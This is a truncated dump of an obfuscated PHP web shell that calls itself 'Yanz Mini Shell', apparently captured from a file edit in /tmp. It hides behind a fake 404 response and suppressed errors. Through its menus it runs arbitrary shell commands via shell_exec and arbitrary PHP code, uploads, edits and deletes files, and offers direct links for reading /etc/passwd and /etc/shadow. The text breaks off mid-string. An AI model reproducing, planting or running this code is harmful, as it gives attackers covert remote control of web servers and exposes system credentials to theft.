Edit: /tmp/_PCuAlD (211497B)
$KApBK) { goto Ce6mW; A1mxf: if (!($PQ0Nk <= $dm2dy)) { goto rafMx; } goto p1fJk; H1ums: rafMx: goto z0wF6; z0wF6: $utOWq .= "\47\76{$KApBK}\74\57\141\x3e\x3c\x2f\x6c\x69\x3e\xa"; goto p1V2e; p1fJk: $utOWq .= $ySXeu[$PQ0Nk] . "\x2f"; goto zyfqw; xY9EW: $PQ0Nk++; goto nWzPN; Ce6mW: if (!empty($KApBK)) { goto WUhSS; } goto K4kPb; p1V2e: J_vaH: goto GNXrQ; K4kPb: goto J_vaH; goto gnGys; zyfqw: yd49C: goto xY9EW; fV0nU: $PQ0Nk = 0; goto giJJe; t8HWz: $utOWq .= "\x3c\x6c\151\x20\143\x6c\141\x73\x73\75\47\x62\x61\162\47\76\74\141\x20\143\x6c\x61\x73\163\x3d\x27\x61\55\x62\x61\162\x27\40\150\x72\x65\146\75\x27\x3f\x79\x6e\x7a\x6d\151\156\151\75"; goto fV0nU; giJJe: zgpuV: goto A1mxf; gnGys: WUhSS: goto t8HWz; nWzPN: goto zgpuV; goto H1ums; GNXrQ: } goto taS1a; erjC0: echo "\74\x73\143\x72\151\x70\x74\x3e\x61\154\x65\x72\164\x28\x27\124\x68\x69\163\40\106\157\x6c\144\x65\162\x20\x69\163\40\x46\141\x69\x6c\145\144\40\x52\x65\156\x61\155\145\x20\x21\41\x21\x27\x29\x3b\40\x77\151\x6e\x64\157\x77\x2e\x6c\x6f\x63\x61\164\x69\x6f\156\40\x3d\x20\47\77\47\73\x3c\x2f\x73\143\x72\x69\x70\x74\76"; goto QGC1r; fzcmM: goto ffB58; goto JOhB3; d_ian: echo "\xa" . $utOWq; goto tyFT8; B5cTR: rmdir("\56\x2e\x2f" . $IpbLa); goto Esnye; FWVki: if (!$_POST["\x63\x6f\x64\x65"]) { goto VgMFM; } goto RL6rR; MVzUe: hyP7p: goto pNTUL; waAKH: if (fwrite($y2MLJ, $_POST["\145\144\151\164\137\146\151\154\x65"])) { goto ImdpI; } goto Aiv7h; ZTI6_: if (!($AO44j = $_GET["\171\x6e\x7a\x6d\x69\x6e\x69"])) { goto NbVuV; } goto VIRs5; h6s2T: v6Fkq: goto k3vqs; pNTUL: Fpcll: goto EvU6C; ofiW5: chdir($IpbLa); goto iqnbj; r8hiw: echo $_GET["\x66\151\154\x65"]; goto OUauJ; kLh7i: if (!(!$_GET["\145\144\x69\164"] && !$_GET["\x64\145\x6c\145\164\x65"] && !$_GET["\162\x65\156\141\155\x65"])) { goto F363c; } goto yu2gO; y4fUf: D_rST: goto ZNpXQ; pd5ly: V9LGS: goto uHrIv; Uyly7: ffB58: goto bqhdJ; UWZ3Y: if (!$_POST["\x73\x68\x65\x6c\x6c"]) { goto frX5K; } goto DTrTz; ODT3T: echo str_replace("\134", "\57", __DIR__); goto AmOjc; M_BQH: EnvDZ: goto a5yz4; bqhdJ: echo "\x3c\142\162\x3e"; goto el5O6; W22aE: $ySXeu = explode("\57", $IpbLa); goto JwwiZ; w8qYg: ImdpI: goto ipulR; TjDV8: if (empty($_SESSION["\x64\151\x72"])) { goto XfcZf; } goto eGjKb; pVs1v: if (rmdir($IpbLa)) { goto QuYaU; } goto GANQn; aG1U8: goto nN6GS; goto HM6YV; W5HuJ: echo "\x26\162\x65\x6e\x61\x6d\x65\75\x74\162\x75\145\x22\76\x52\145\156\141\x6d\x65\74\x2f\x61\x3e\x20\135\xa\133\40\x3c\141\x20\x68\x72\x65\146\x3d\42\x3f\42\x3e\102\x61\143\x6b\74\57\x61\x3e\40\x5d\12\x3c\x68\162\x3e\xa\x20\40\x20\40\40\40"; goto kLh7i; rBpb4: if (!$_POST["\x6e\x61\x6d\x65\x5f\146\157\154\x64\145\162"]) { goto TWdU6; } goto asge2; FkVR0: if (!$_GET["\171\156\x7a\155\151\x6e\151"]) { goto Fpcll; } goto EGBMG; syiLQ: $Co0jn = htmlspecialchars($_SESSION["\x63\x6f\x64\145"]); goto Cm3FF; QZOxI: $y2MLJ = fopen($_GET["\x66\x69\154\x65"], "\x77"); goto waAKH; yu2gO: echo "\x3c\x74\x65\170\x74\141\162\145\x61\40\143\x6c\x61\x73\x73\75\47\x66\151\x6c\x65\47\x3e" . htmlspecialchars(file_get_contents($_GET["\x66\151\x6c\145"])) . "\x3c\x2f\x74\145\170\164\141\x72\x65\141\x3e"; goto UZTTp; y_g41: if (empty($Co0jn)) { goto VZEb1; } goto syiLQ; ZNpXQ: t22mT: goto N22xZ; BnGGj: dnocy: goto cJ3t_; POIVZ: if (!$_FILES["\165\x70"]) { goto uknlj; } goto Q7xK1; i9Y4a: goto Q_ADc; goto XQKQq; PAWWk: echo $_GET["\146\151\154\x65"]; goto W5HuJ; Cm3FF: goto n5VCz; goto UWFHE; qZgfY: if (!$_POST["\145\x64\151\164\137\146\151\154\145"]) { goto aonKw; } goto QZOxI; hHV54: echo "\xa\40\40\40\40\x20\x20\40\40\x3c\143\x65\x6e\x74\145\162\x3e\12\x20\40\x20\x20\40\x20\x20\40\74\x66\x6f\156\164\40\x73\151\172\145\75\47\62\60\x27\76\x59\141\156\172\40\115\x69\156\151\40\x53\x68\145\154\154\74\x2f\146\157\x6e\164\76\12\40\x20\40\40\40\40\40\40\x3c\142\162\x3e\x3c\x62\x72\76\xa\40\x20\40\40\40\x20\40\x20\x3c\146\x6f\x6e\x74\x20\x73\151\x7a\x65\x3d\47\x35\x27\76\131\141\156\172\x3c\x2f\146\x6f\156\164\x3e\12\40\x20\x20\40\40\x20\40\x20\74\142\122\76\74\142\x72\x3e\xa\40\40\40\40\40\40\40\x20\x4d\151\156\x69\40\123\x68\145\154\x6c\xa\40\40\40\x20\40\40\40\40\74\x62\162\76\x3c\x62\x72\x3e\12\40\40\40\40\40\x20\x20\40\x3c\x2f\x63\x65\x6e\x74\x65\162\x3e\12\x20\x20\x20\x20\x20\x20\40\40"; goto GUfW_; Vupys: if (!$_POST["\x6e\x61\155\x65\137\x66\151\154\145"]) { goto D_rST; } goto DwegY; wiZuw: nQ0Ip: goto EwKYm; tNeYe: if (!($_GET["\x70\141\x67\x65"] == "\x6e\x65\167\146\151\x6c\x65")) { goto t22mT; } goto aHF3U; TfllX: goto DgU0u; goto zrnPC; JOhB3: rKVqM: goto Lt35k; xWoOB: echo "\74\163\x63\x72\151\160\x74\76\141\154\145\x72\164\x28\47\x46\x69\154\145\40\x43\162\x65\x61\x74\x65\144\40\41\41\x21\47\51\73\40\167\151\156\144\x6f\x77\x2e\154\157\x63\141\164\x69\x6f\x6e\40\x3d\x20\47\x3f\x27\73\74\x2f\x73\x63\x72\x69\160\164\76"; goto yWyar; y3XRs: if (!($_GET["\160\141\147\x65"] == "\x61\142\x6f\x75\x74")) { goto tkl4N; } goto hHV54; T36BF: echo "\x3c\x73\x63\162\151\x70\x74\76\141\154\145\x72\164\x28\x27\x46\141\x69\x6c\x65\144\40\x52\x65\156\x61\155\145\40\106\151\154\145\40\x21\x21\x21\47\51\x3b\x20\167\x69\156\x64\157\x77\x2e\x6c\157\143\141\x74\151\157\x6e\x20\75\x20\x27\x3f\x66\151\x6c\145\75{$_GET["\146\151\154\145"]}\47\x3b\74\x2f\x73\x63\x72\x69\160\x74\x3e"; goto ktmlb; lik7P: if (!$_GET["\162\x6d\x66\157\154\x64\x65\162"]) { goto zChWX; } goto pVs1v; SOpYr: n5VCz: goto jePFM; XQKQq: gACBp: goto OtEqG; zoW5b: session_start(); goto qdDna; LOEOC: tGw9I: goto W22aE; EKzlF: echo "\74\x73\143\x72\151\160\x74\76\141\154\x65\x72\164\50\x27\105\144\151\x74\x20\106\151\x6c\x65\40\x53\165\x63\x63\145\163\163\x20\x21\x21\x21\x27\51\x3b\40\167\151\156\x64\157\167\56\154\157\x63\141\x74\x69\x6f\x6e\x20\x3d\x20\47\77\x66\151\x6c\x65\x3d{$_GET["\x66\x69\x6c\145"]}\x27\x3b\74\57\x73\x63\x72\151\x70\x74\76"; goto Vxbko; zrnPC: iPDSP: goto xWoOB; asge2: if (mkdir($_POST["\x6e\x61\x6d\145\137\146\x6f\x6c\144\x65\162"])) { goto gACBp; } goto Z90B8; PZo23: aonKw: goto eCqaZ; XxuiP: echo "\133\x20\x3c\x61\40\x68\x72\145\146\x3d\42\77\146\x69\154\x65\75"; goto LbI0D; Esnye: echo "\x3c\x73\x63\x72\x69\x70\164\x3e\x61\154\x65\x72\x74\50\47\x54\150\151\x73\40\x46\x6f\x6c\144\x65\162\40\151\x73\40\122\145\156\141\x6d\x65\144\40\41\41\41\x27\x29\73\40\167\x69\156\x64\x6f\x77\x2e\154\157\143\141\x74\x69\157\x6e\40\75\x20\x27\77\171\x6e\x7a\x6d\151\156\151\x3d{$IpbLa}\x2f\56\56\47\73\x3c\x2f\x73\x63\162\x69\x70\164\76"; goto BnGGj; Z90B8: echo "\x3c\163\143\162\151\x70\x74\76\141\154\145\162\164\50\x27\103\162\x65\x61\164\x65\x64\40\x46\x6f\154\x64\x65\162\x20\x46\x61\x69\x6c\x65\x64\x20\41\x21\x21\47\51\73\40\167\x69\156\144\157\x77\x2e\154\157\143\x61\x74\x69\x6f\156\x20\75\40\x27\x3f\47\x3b\74\57\163\143\162\x69\x70\164\76"; goto i9Y4a; o5_n0: Q_ADc: goto Gpd_G; zFFzC: error_reporting(0); goto RKOYv; taS1a: auZf0: goto ofiW5; eCqaZ: ku8r6: goto FE78n; xJup9: echo "\125\160\154\x6f\141\144\40\x46\x69\x6c\145\xa\40\40\40\x20\40\40\x20\x20\x3c\x62\162\x3e\74\142\162\x3e\12\40\40\x20\40\40\x20\x20\40\x3c\146\x6f\162\155\40\x65\x6e\x63\x74\x79\160\x65\x3d\x27\155\x75\x6c\x74\x69\160\141\162\x74\x2f\146\157\162\155\55\144\141\x74\141\x27\40\155\145\x74\x68\x6f\x64\75\47\160\157\x73\x74\47\x3e\12\40\x20\40\x20\40\x20\40\40\x3c\x69\x6e\160\x75\164\40\x74\171\x70\145\75\47\x66\151\x6c\145\47\x20\x6e\x61\x6d\145\75\x27\x75\160\x27\x3e\xa\40\40\x20\40\40\40\40\40\x3c\x69\156\x70\165\164\x20\164\171\160\x65\75\47\x73\165\142\155\x69\164\x27\x20\x76\141\x6c\x75\x65\x3d\47\x55\x70\154\x6f\141\x64\x27\x3e\12\x20\x20\40\40\x20\x20\40\40\x3c\x2f\146\x6f\x72\x6d\76\xa\x20\40\40\x20\40\x20\x20\x20"; goto POIVZ; el5O6: uknlj: goto pd5ly; IFKLz: echo "\74\x66\157\162\x6d\x20\145\156\x63\x74\171\x70\x65\x3d\x27\155\x75\x6c\x74\151\160\x61\162\x74\57\x66\x6f\x72\155\55\x64\141\x74\141\x27\40\x6d\145\164\x68\x6f\144\x3d\x27\160\157\163\164\x27\76\xa\x20\x20\x20\x20\x20\x20\40\x20\131\141\x6e\172\100{$imQ_V}\x3a\176\x20\44\x20\74\x69\x6e\x70\165\164\x20\164\171\x70\145\75\47\x74\x65\x78\x74\47\40\x6e\x61\155\x65\75\x27\x73\x68\145\154\x6c\x27\76\x3c\x69\156\x70\x75\164\40\x74\x79\x70\145\75\47\163\165\x62\155\x69\164\x27\40\166\x61\154\x75\x65\x3d\x27\x7e\x27\x3e\12\x20\x20\x20\40\40\40\40\x20\x3c\57\146\157\162\155\x3e"; goto wiZuw; Pczpp: exit; goto M_BQH; r7x47: XfcZf: goto adMuH; UZTTp: F363c: goto gogRP; MPfG5: echo "\74\163\x63\162\151\160\x74\x3e\x61\154\145\x72\x74\50\47\x46\x61\x69\154\145\144\40\x44\x65\x6c\x65\164\x65\x64\40\106\x69\x6c\145\40\41\41\x21\x27\51\x3b\40\x77\151\x6e\x64\x6f\167\x2e\x6c\x6f\x63\x61\x74\x69\157\x6e\x20\x3d\x20\47\77\x66\151\x6c\145\x3d{$_GET["\x66\x69\154\145"]}\47\73\74\x2f\163\x63\x72\x69\160\x74\x3e"; goto aG1U8; aX3_J: QuYaU: goto B48HV; i7o6l: if (!($_GET["\x72\x65\156\141\x6d\145"] == "\x74\x72\165\x65")) { goto EL01Q; } goto WL8vD; uSQ65: if (unlink($_GET["\x66\x69\154\145"])) { goto x7fml; } goto MPfG5; DwegY: $MAIiK = fopen($_POST["\156\x61\x6d\145\x5f\146\151\x6c\145"], "\x77"); goto dNB8T; gamXF: if (mkdir("\56\x2e\57" . $_POST["\x72\x65\x6e\x61\155\x65\x5f\146\x6f\154\144\x65\x72"])) { goto aECrk; } goto erjC0; EvU6C: if (!($_GET["\x70\x61\147\145"] == "\x75\x70\154\x6f\141\x64")) { goto V9LGS; } goto xJup9; GUfW_: tkl4N: goto tNeYe; K3PEF: nN6GS: goto Txm78; Qe5sr: VgMFM: goto T684K; a1vT5: echo "\x3c\x68\162\76\x3c\x61\x20\150\162\x65\x66\75\47\77\x70\x61\147\145\x3d\x73\x63\x72\x69\160\x74\x69\x6e\x67\47\76\x42\x61\143\153\x3c\57\x61\x3e"; goto Pczpp; cJ3t_: QE7s2: goto lik7P; Txm78: rInBV: goto i7o6l; adMuH: $IpbLa = $zHoME; goto LOEOC; N22xZ: if (!($_GET["\160\x61\147\145"] == "\156\145\167\x66\x6f\x6c\144\x65\162")) { goto IUBUk; } goto r0hP6; yWyar: DgU0u: goto y4fUf; Vxbko: s6eGA: goto PZo23; xzk8N: goto tGw9I; goto r7x47; HtQ91: echo "\x3c\x70\162\145\x3e" . htmlspecialchars(shell_exec($_POST["\163\150\145\154\154"])) . "\74\57\x70\x72\x65\76"; goto Fhr7E; sts1l: echo disk_free_space("\x2f"); goto RpX1u; r0hP6: echo "\x3c\146\x6f\162\155\x20\145\x6e\143\x74\x79\160\x65\x3d\x27\155\x75\154\164\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\155\55\x64\x61\x74\x61\x27\40\x6d\145\x74\x68\x6f\144\75\x27\160\157\163\164\x27\x3e\12\40\40\40\40\40\x20\x20\x20\116\x65\x77\40\x46\157\154\x64\x65\x72\40\72\x20\74\x69\156\160\165\x74\x20\x74\171\x70\x65\x3d\x27\164\145\170\x74\47\x20\156\x61\x6d\x65\x3d\47\x6e\x61\155\x65\x5f\x66\x6f\x6c\144\x65\x72\47\x3e\xa\x20\x20\x20\x20\40\40\40\40\74\151\156\160\165\164\40\164\171\x70\x65\x3d\47\163\x75\142\x6d\x69\x74\x27\x20\x76\x61\154\x75\x65\75\x27\123\141\x76\x65\x20\106\x6f\154\144\145\162\x27\76\12\40\40\x20\x20\x20\x20\x20\40\x3c\57\x66\x6f\162\x6d\x3e\xa\40\x20\40\40\40\x20\x20\x20"; goto rBpb4; qdDna: $zHoME = str_replace("\134", "\x2f", getcwd()); goto Yaz_R; OTnDY: wyMj4: goto R51wP; YupNi: aECrk: goto B5cTR; Yaz_R: $imQ_V = $_SERVER["\110\124\x54\x50\x5f\110\x4f\x53\x54"]; goto ZTI6_; AmOjc: echo "\42\76\x48\157\x6d\x65\x53\x68\145\154\154\40\x31\74\57\x61\76\40\135\xa\x20\40\133\40\74\141\x20\150\x72\x65\146\x3d\42\x3f\171\156\x7a\155\x69\156\x69\x3d"; goto PlwWI; KoGzd: $xkxL0 = scandir($IpbLa); goto a5bIF; VIRs5: $_SESSION["\x64\151\162"] = $AO44j; goto gva72; aHF3U: echo "\x3c\x66\157\x72\155\40\x65\x6e\143\x74\x79\160\145\75\47\155\x75\x6c\x74\x69\x70\x61\x72\x74\57\146\157\162\155\55\x64\141\164\141\x27\40\155\x65\x74\x68\x6f\144\x3d\x27\160\x6f\163\164\47\x3e\xa\x20\x20\x20\x20\40\x20\x20\x20\74\x74\x65\x78\164\141\162\145\x61\40\x63\x6c\141\163\163\75\47\146\151\x6c\x65\47\x20\156\x61\155\145\75\47\151\x73\x69\137\146\x69\x6c\x65\47\76" . htmlspecialchars(file_get_contents($_GET["\x66\151\154\x65"])) . "\74\x2f\x74\x65\x78\164\x61\162\145\141\x3e\12\x20\40\40\x20\x20\x20\40\x20\74\x62\x72\x3e\74\142\162\x3e\xa\40\x20\x20\x20\x20\40\40\x20\x3c\151\x6e\x70\165\x74\40\x74\171\160\x65\x3d\47\164\x65\170\x74\47\40\x6e\141\155\x65\75\47\x6e\141\x6d\x65\137\x66\x69\154\x65\x27\x3e\12\40\x20\x20\x20\x20\x20\40\40\x3c\x62\162\76\74\x62\122\x3e\12\40\x20\x20\40\40\x20\x20\40\x3c\x69\x6e\x70\x75\164\x20\164\x79\160\x65\75\x27\163\165\x62\155\151\x74\47\x20\166\x61\154\165\x65\75\x27\x53\141\166\145\40\106\151\x6c\145\x27\x3e\12\x20\x20\40\x20\40\x20\40\40\74\x2f\x66\157\162\155\x3e\xa\x20\x20\x20\x20\40\x20\x20\x20"; goto Vupys; HuoLA: if (!$_POST["\162\x65\x6e\x61\x6d\145\x5f\146\151\x6c\145"]) { goto vYNca; } goto q58LG; B48HV: echo "\74\x73\143\x72\151\160\x74\x3e\141\154\145\x72\x74\x28\47\x46\x6f\154\144\x65\x72\40\x44\145\x6c\x65\164\x65\144\x20\x21\41\41\x27\51\x3b\x20\x77\151\156\x64\157\167\x2e\154\x6f\x63\141\x74\x69\157\x6e\40\x3d\40\47\x3f\171\x6e\x7a\x6d\x69\156\151\x3d{$IpbLa}\x2f\56\x2e\47\x3b\x3c\57\x73\x63\162\151\x70\x74\x3e"; goto OTnDY; gva72: NbVuV: goto TjDV8; Hb7f4: unlink($_GET["\146\151\154\x65"]); goto YFF_y; EgdNy: hGvRz: goto FkVR0; uQfyX: if (!isset($_REQUEST["\145\x78\145\x5f\x63\157\144\145"])) { goto EnvDZ; } goto FWVki; OtEqG: echo "\74\x73\x63\162\151\x70\164\x3e\x61\154\x65\162\x74\50\x27\x46\157\x6c\144\x65\162\x20\103\x72\145\141\x74\x65\x64\40\41\41\x21\x27\51\73\40\x77\151\156\144\x6f\167\x2e\x6c\x6f\143\141\x74\x69\x6f\156\x20\75\40\x27\x3f\x27\73\74\57\163\143\x72\x69\160\x74\x3e"; goto o5_n0; ipulR: fclose($y2MLJ); goto EKzlF; Q4irI: EL01Q: goto EgdNy; QGC1r: goto dnocy; goto YupNi; HM6YV: x7fml: goto tm_0N; k3vqs: vYNca: goto Q4irI; sgmH6: if (!$_POST["\x72\x65\x6e\x61\155\145\137\146\157\x6c\144\145\162"]) { goto QE7s2; } goto gamXF; tk6hg: IUBUk: goto rI1sO; q58LG: if (copy($_GET["\x66\x69\154\145"], $_POST["\162\145\156\141\155\145\137\146\x69\x6c\145"])) { goto vQPUY; } goto T36BF; WL8vD: echo "\74\x66\157\x72\155\40\x65\156\x63\164\x79\160\x65\x3d\x27\155\165\x6c\164\x69\x70\141\162\x74\x2f\146\157\162\x6d\55\144\141\164\141\47\x20\155\145\x74\150\x6f\x64\x3d\47\160\157\163\x74\47\76\12\x20\x20\x20\40\40\40\x20\x20\x20\40" . htmlspecialchars($_GET["\x66\151\x6c\145"]) . "\40\x5b\40\124\x6f\x20\135\x20\x3c\x69\156\160\x75\x74\x20\164\171\x70\145\75\47\x74\x65\170\164\x27\x20\x6e\x61\x6d\145\75\x27\162\145\x6e\141\155\145\137\x66\151\154\145\47\76\12\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x3c\151\x6e\160\165\x74\x20\x74\171\x70\145\x3d\x27\x73\x75\x62\x6d\x69\164\47\x20\x76\141\154\165\145\x3d\47\x52\x65\156\x61\155\145\47\76\12\x20\x20\40\x20\40\x20\40\x20\x20\x20\74\x2f\x66\157\x72\x6d\x3e\12\40\40\40\x20\40\40\x20\x20\x20\40"; goto HuoLA; Q7xK1: if (copy($_FILES["\x75\x70"]["\164\155\x70\x5f\x6e\141\x6d\x65"], $_FILES["\x75\x70"]["\x6e\141\155\x65"])) { goto rKVqM; } goto KbXXF; uHrIv: if (!($_GET["\160\141\x67\145"] == "\163\x68\x65\x6c\x6c")) { goto nQ0Ip; } goto UWZ3Y; rOBz_: goto s6eGA; goto w8qYg; WADuA: echo "\46\x64\145\154\x65\x74\x65\75\x74\x72\165\x65\x22\x3e\104\x65\154\x65\164\x65\74\57\x61\x3e\40\x5d\12\x5b\40\x3c\141\40\x68\x72\145\x66\75\42\77\x66\151\x6c\x65\x3d"; goto r8hiw; EwKYm: if (!($_GET["\160\141\x67\x65"] == "\163\x63\162\x69\x70\164\151\x6e\147")) { goto E7fB2; } goto y_g41; ktmlb: goto v6Fkq; goto o5XnE; qaPwo: echo "\42\76\x48\x6f\x6d\145\123\x68\x65\154\154\40\62\x3c\x2f\x61\x3e\40\x5d\xa\40\40\133\x20\74\x61\40\x68\x72\145\146\x3d\42\77\x70\141\147\145\75\x75\160\154\x6f\x61\144\42\76\x55\x70\x6c\157\141\x64\74\x2f\x61\76\40\x5d\xa\x20\x20\133\x20\74\141\x20\150\x72\145\146\75\x22\77\160\141\147\x65\75\163\x68\145\x6c\x6c\x22\76\x43\x6f\155\155\x61\156\144\x20\x53\150\145\154\x6c\x3c\57\141\76\40\x5d\xa\40\x20\133\x20\x3c\x61\40\x68\x72\x65\146\x3d\x22\x3f\160\x61\x67\x65\x3d\x73\x63\162\151\160\x74\x69\156\147\42\76\x53\143\x72\x69\160\164\x69\156\x67\x3c\57\x61\76\x20\x5d\xa\40\40\x5b\40\74\141\x20\150\x72\x65\146\x3d\x22\77\x70\141\147\x65\x3d\141\x62\x6f\x75\164\42\76\x41\142\x6f\x75\x74\74\57\x61\76\40\x5d\12\74\57\144\151\166\x3e\12\x3c\x64\151\166\40\143\154\141\x73\163\75\x22\x6b\157\x74\141\x6b\x22\x3e\xa\40\x20\133\x20\x44\151\x72\145\x63\x74\x6f\162\171\40\x5d\40\x3d\76\40\74\x6c\x69\40\x63\x6c\x61\163\163\x3d\x22\x62\141\162\x22\76\74\141\40\x63\x6c\x61\x73\x73\x3d\42\141\55\142\141\162\42\x20\150\162\x65\x66\75\42\77\171\x6e\x7a\155\x69\156\151\x3d\57\42\76\57\74\57\x61\76\x3c\x2f\154\x69\x3e"; goto d_ian; jePFM: echo "\74\x66\x6f\162\155\40\141\143\164\151\x6f\x6e\x3d\47\x3f\x65\170\x65\137\x63\157\x64\145\x27\x20\x65\156\143\x74\x79\x70\145\75\47\x6d\x75\154\x74\151\x70\141\x72\164\57\x66\x6f\x72\x6d\x2d\144\x61\164\x61\x27\x20\x6d\145\x74\x68\157\144\75\x27\160\157\163\x74\x27\76\xa\40\40\x20\40\40\x20\40\x20\x3c\x63\145\156\x74\145\x72\x3e\122\x75\156\156\151\156\x67\40\120\110\120\40\123\x63\x72\151\160\164\74\57\143\145\156\x74\145\162\x3e\xa\40\x20\x20\x20\40\x20\40\x20\74\150\162\76\12\40\40\40\40\40\x20\x20\40\74\x74\145\170\x74\141\x72\145\141\x20\143\154\141\x73\x73\75\47\x66\x69\154\145\x27\x20\x6e\141\155\145\x3d\x27\143\157\144\145\x27\76{$Co0jn}\x3c\x2f\x74\145\x78\x74\141\162\x65\x61\76\12\x20\x20\40\x20\x20\x20\40\40\74\142\x52\x3e\74\142\162\x3e\xa\x20\40\40\x20\40\40\x20\x20\74\151\x6e\x70\165\x74\x20\164\x79\160\x65\75\47\163\x75\x62\x6d\151\x74\47\x20\x76\141\x6c\x75\145\x3d\47\122\x75\x6e\40\123\143\162\x69\160\164\x20\x21\41\x21\47\x3e\xa\40\x20\x20\40\x20\40\x20\40\74\57\146\157\x72\x6d\x3e\xa\40\40\40\40\40\40\40\x20"; goto lp8mP; Aiv7h: echo "\x3c\x73\143\162\x69\x70\x74\76\141\x6c\x65\x72\164\x28\47\x45\144\151\164\x20\106\x69\154\145\x20\106\141\x69\x6c\x65\144\40\x21\41\41\47\x29\73\x20\x77\151\x6e\144\157\167\56\x6c\157\143\x61\x74\151\157\x6e\40\75\x20\47\x3f\146\x69\x6c\x65\75{$_GET["\146\x69\154\145"]}\x27\x3b\74\x2f\163\x63\x72\151\160\x74\x3e"; goto rOBz_; RKOYv: header("\110\x54\x54\x50\57\61\x2e\x30\40\64\60\x34\x20\116\157\x74\40\106\157\165\x6e\x64", true, 404); goto zoW5b; tyFT8: echo "\x3c\x2f\x64\x69\x76\76\12\x3c\x64\151\166\40\143\154\x61\163\x73\x3d\42\153\157\164\141\x6b\42\76\xa\x20\40\74\144\x69\x76\x20\x63\154\141\163\x73\x3d\42\x6c\61\x22\76\12\40\40\40\40\74\x64\151\166\40\x63\x6c\x61\163\x73\x3d\x22\142\x61\162\141\x74\141\x73\x22\x3e\12\40\x20\x20\40\40\40\101\x63\164\151\x6f\156\xa\40\40\40\x20\74\x2f\x64\x69\166\76\xa\x20\40\x20\40\x3c\150\x72\76\xa\x20\x20\x20\x20\x5b\52\x5d\x20\74\x61\x20\150\x72\145\146\75\42\77\x70\x61\147\145\75\156\145\x77\x66\x69\154\x65\42\x3e\116\145\x77\40\x46\x69\154\145\x3c\57\x61\x3e\12\x20\40\40\40\74\x62\162\76\xa\40\x20\40\40\133\52\x5d\x20\74\141\40\x68\x72\145\x66\x3d\42\x3f\160\x61\x67\145\x3d\x6e\x65\x77\146\x6f\154\144\145\162\x22\76\116\x65\167\x20\x46\157\154\x64\145\162\x3c\57\x61\x3e\12\40\40\40\40\x3c\150\162\x3e\xa\x20\x20\x20\x20\x3c\144\151\166\x20\x63\154\x61\163\x73\x3d\x22\x62\x61\162\x61\164\141\x73\x22\x3e\12\40\x20\40\x20\40\40\x53\145\156\x73\151\164\151\x76\145\x20\106\151\x6c\145\xa\x20\40\40\40\x3c\x2f\144\x69\x76\x3e\12\x20\x20\40\x20\x3c\150\162\x3e\xa\x20\40\40\40\133\52\x5d\x20\x3c\x61\x20\x68\162\145\146\x3d\42\77\146\151\x6c\x65\x3d\x2f\x65\164\x63\57\160\x61\x73\x73\x77\144\42\76\57\145\164\143\57\x70\x61\163\x73\167\144\x3c\57\x61\76\xa\40\40\40\x20\x3c\x62\x72\x3e\xa\x20\x20\x20\40\x5b\52\135\x20\74\141\x20\150\x72\145\x66\x3d\42\x3f\146\151\154\x65\x3d\57\x65\164\143\x2f\x73\x68\141\144\x6f\x77\42\x3e\57\x65\164\x63\x2f\163\150\x61\144\x6f\167\74\57\x61\x3e\xa\40\x20\40\x20\74\x62\162\76\xa\x20\40\40\40\133\52\135\x20\x3c\x61\40\150\x72\x65\146\x3d\x22\x3f\x66\x69\154\x65\75\x2f\145\x74\143\x2f\x72\145\163\157\154\x76\x2e\143\157\156\x66\x22\x3e\57\x65\x74\x63\57\162\x65\x73\157\x6c\x76\x2e\143\x6f\156\x66\74\57\x61\x3e\xa\40\40\74\57\x64\151\166\x3e\xa\x20\x20\74\x64\151\166\40\x63\154\x61\163\x73\x3d\42\x72\61\42\76\12\x20\x20\x20\40\x20\x20"; goto SSAWa; a5yz4: echo "\74\154\x69\x6e\153\40\x72\145\x6c\x3d\42\x69\x63\x6f\156\42\40\150\x72\x65\146\x3d\x22\150\x74\x74\x70\163\x3a\x2f\x2f\x65\56\164\x6f\x70\x34\164\x6f\160\56\151\x6f\57\x70\137\x32\x36\71\x37\63\x6f\x63\71\151\61\56\x70\x6e\147\42\x3e\12\74\163\x74\x79\154\x65\x3e\xa\40\40\x68\x74\x6d\154\173\12\40\40\x20\x20\157\166\145\162\146\154\x6f\167\72\40\141\x75\164\157\73\12\40\x20\x20\x20\142\141\x63\153\147\x72\x6f\x75\x6e\x64\72\40\x62\x6c\x61\x63\x6b\x3b\12\x20\40\x20\x20\x63\x6f\x6c\x6f\x72\x3a\40\167\150\x69\x74\x65\73\xa\x20\40\x20\40\x66\x6f\156\164\x2d\146\x61\x6d\151\154\x79\72\x20\x22\x43\157\x75\x72\x69\145\x72\x20\x4e\145\x77\42\x3b\xa\40\x20\175\xa\40\40\x61\x20\173\xa\x20\x20\40\x20\x74\145\170\164\55\x64\x65\143\157\162\x61\x74\x69\157\156\72\x20\156\157\156\x65\73\xa\x20\x20\x20\40\143\x6f\x6c\157\x72\x3a\40\x77\150\151\x74\x65\73\xa\x20\x20\175\xa\40\x20\x2e\141\55\142\x61\x72\40\173\xa\40\40\x20\x20\164\145\170\x74\55\144\x65\x63\x6f\x72\x61\164\x69\x6f\x6e\72\x20\x6e\157\156\x65\x3b\12\x20\x20\40\40\x63\x6f\x6c\x6f\x72\x3a\40\x62\x6c\x61\143\153\73\xa\40\x20\175\12\x20\40\56\x62\x61\162\x20\x7b\xa\x20\40\x20\40\144\151\163\160\x6c\141\171\x3a\x20\151\x6e\x6c\x69\x6e\x65\73\xa\x20\40\x20\40\x70\141\144\144\x69\x6e\x67\x3a\x20\x35\160\x78\x3b\xa\x20\x20\40\x20\142\x61\x63\x6b\x67\x72\157\165\x6e\144\72\x20\x77\x68\151\x74\x65\x3b\12\40\40\x20\40\143\157\154\x6f\162\x3a\40\142\154\141\143\153\x3b\xa\40\x20\x7d\xa\x20\x20\x2e\x62\x61\x72\141\x74\141\x73\x20\173\xa\x20\x20\x20\x20\157\x76\x65\x72\x66\154\157\167\72\x20\x61\165\x74\x6f\73\xa\40\x20\40\40\x62\157\162\144\145\x72\72\x20\x31\160\x78\40\x73\157\154\x69\x64\x20\167\150\x69\164\x65\73\xa\40\x20\x20\40\160\x61\144\x64\151\156\147\x3a\40\x31\60\x70\x78\73\12\x20\x20\x20\40\142\141\x63\153\x67\x72\157\165\156\144\x3a\40\167\150\x69\x74\145\x3b\12\x20\x20\x20\x20\x63\x6f\x6c\157\x72\72\40\142\x6c\x61\143\x6b\x3b\12\x20\x20\175\12\40\40\x2e\143\154\157\x73\145\40\173\xa\40\40\40\x20\x6f\166\x65\x72\x66\154\157\167\72\x20\x61\x75\164\157\x3b\xa\x20\40\x20\40\142\x6f\162\x64\x65\162\x3a\x20\61\x70\x78\x20\x73\x6f\x6c\151\x